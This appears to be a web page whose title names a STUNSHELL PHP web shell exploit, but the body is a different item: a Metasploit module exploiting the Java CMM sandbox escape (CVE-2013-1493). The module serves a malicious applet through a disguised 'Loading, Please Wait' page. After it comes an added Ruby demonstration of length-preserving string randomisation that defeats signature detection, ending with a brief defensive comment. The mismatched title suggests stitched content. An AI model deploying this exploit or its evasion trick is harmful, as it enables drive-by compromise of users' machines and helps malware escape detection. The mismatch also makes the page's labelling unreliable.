
STUNSHELL PHP Web Shell Remote Code Execution

Posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',      # Vulnerability discovery and Exploit
          'juan vazquez'  # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Load the precompiled applet classes shipped with the framework and rename
  # the entry class so the served JAR does not carry the well-known "Init" name.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    # Same-length random name, so the byte-level gsub over the class file keeps
    # its length-prefixed constant-pool entries intact.
    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      # Build the JAR: the Java payload classes plus the exploit classes.
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Replace the "metasploit"/"Payload" markers in entry names and bytes with
      # random strings of identical length to defeat simple static signatures.
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Landing page: a 1x1 applet whose archive name is random per request and
  # whose code attribute points at the renamed Init class.
  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end
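The module's JAR-handling branch renames every "metasploit"/"Payload" marker in both entry names and raw class bytes, and it does so with random tokens of exactly the same length. The length constraint matters: a Java class file's constant pool stores each CONSTANT_Utf8 string as a tag byte, a two-byte big-endian length, and then the bytes, so a blanket byte-level gsub with a shorter or longer token leaves the length prefixes pointing at the wrong bytes and the JVM rejects the class. The following added example (my code, not part of the module or the Metasploit Framework) reproduces that substitution over constructed stand-in entries and checks the result by re-parsing a minimal constant-pool encoding. The helper names (`rand_alpha`, `length_preserving_table`, `encode_utf8_entries`, `decode_utf8_entries`, `randomize_entries`, `randomization_valid?`) and the sample entries are assumptions for the example; `rand_alpha` stands in for Metasploit's `rand_text_alpha`.

```ruby
require 'securerandom'

ALPHA = [*'a'..'z', *'A'..'Z'].freeze

# Random alphabetic token of exactly len characters; stands in for
# Metasploit's rand_text_alpha (hypothetical helper for this example).
def rand_alpha(len)
  Array.new(len) { ALPHA[SecureRandom.random_number(ALPHA.size)] }.join
end

# Substitution table in the form the module builds at request time: every
# marker maps to a random token of the SAME length as the marker.
def length_preserving_table(markers)
  markers.each_with_object({}) { |m, h| h[m] = rand_alpha(m.length) }
end

# Encode strings the way a class file's constant pool stores CONSTANT_Utf8
# entries: tag 0x01, u2 big-endian byte length, then the bytes. Constructed
# sample data for this example, not a real class file.
def encode_utf8_entries(strings)
  strings.map { |s| [1, s.bytesize].pack('Cn') + s.b }.join.b
end

# Walk the pool back out. Returns nil when a length prefix no longer lines up
# with the bytes behind it, which is what a JVM's class-file parser rejects.
def decode_utf8_entries(blob)
  out = []
  i = 0
  while i < blob.bytesize
    return nil unless blob.getbyte(i) == 1 && i + 3 <= blob.bytesize
    len = blob.byteslice(i + 1, 2).unpack1('n')
    return nil if i + 3 + len > blob.bytesize
    out << blob.byteslice(i + 3, len)
    i += 3 + len
  end
  out
end

# The module's loop: gsub every marker in both the entry name and the entry
# bytes. Entries are [name, data] pairs, mirroring jar.entries.
def randomize_entries(entries, subst)
  entries.map do |name, data|
    new_name = name.dup
    new_data = data.dup
    subst.each do |from, to|
      new_name = new_name.gsub(from, to)
      new_data = new_data.gsub(from, to)
    end
    [new_name, new_data]
  end
end

# Constructed stand-ins for the JAR entries the module rewrites.
SAMPLE_ENTRIES = [
  ['metasploit/Payload.class',
   encode_utf8_entries(['metasploit/Payload', 'java/lang/Object'])],
  ['metasploit/PayloadRunner.class',
   encode_utf8_entries(['metasploit/PayloadRunner', 'metasploit/Payload'])]
].freeze

MARKERS = ['metasploit', 'Payload'].freeze

# True only if every rewritten entry still parses AND no marker survives in
# entry names or constant-pool strings.
def randomization_valid?(subst)
  randomize_entries(SAMPLE_ENTRIES, subst).all? do |name, data|
    strings = decode_utf8_entries(data)
    next false if strings.nil?
    [name, *strings].none? { |s| MARKERS.any? { |m| s.include?(m) } }
  end
end

if __FILE__ == $PROGRAM_NAME
  good = length_preserving_table(MARKERS)
  bad  = { 'metasploit' => 'msf', 'Payload' => 'pl' } # shorter tokens
  puts "same-length tokens #{good.inspect}: valid=#{randomization_valid?(good)}"
  puts "short tokens #{bad.inspect}: valid=#{randomization_valid?(bad)}"
end
```

Running the file shows the same-length table passing and the short-token table failing the re-parse. The same reasoning applies to the `Init` rename in `setup`, which also uses a token of `"Init".length`. On the defensive side, this is why a signature on the literal strings "metasploit" or "Payload" inside a served JAR is brittle: the class structure, the 1x1 applet tag, and the `.jar`-then-`/` request pattern survive the renaming, while the marker strings do not.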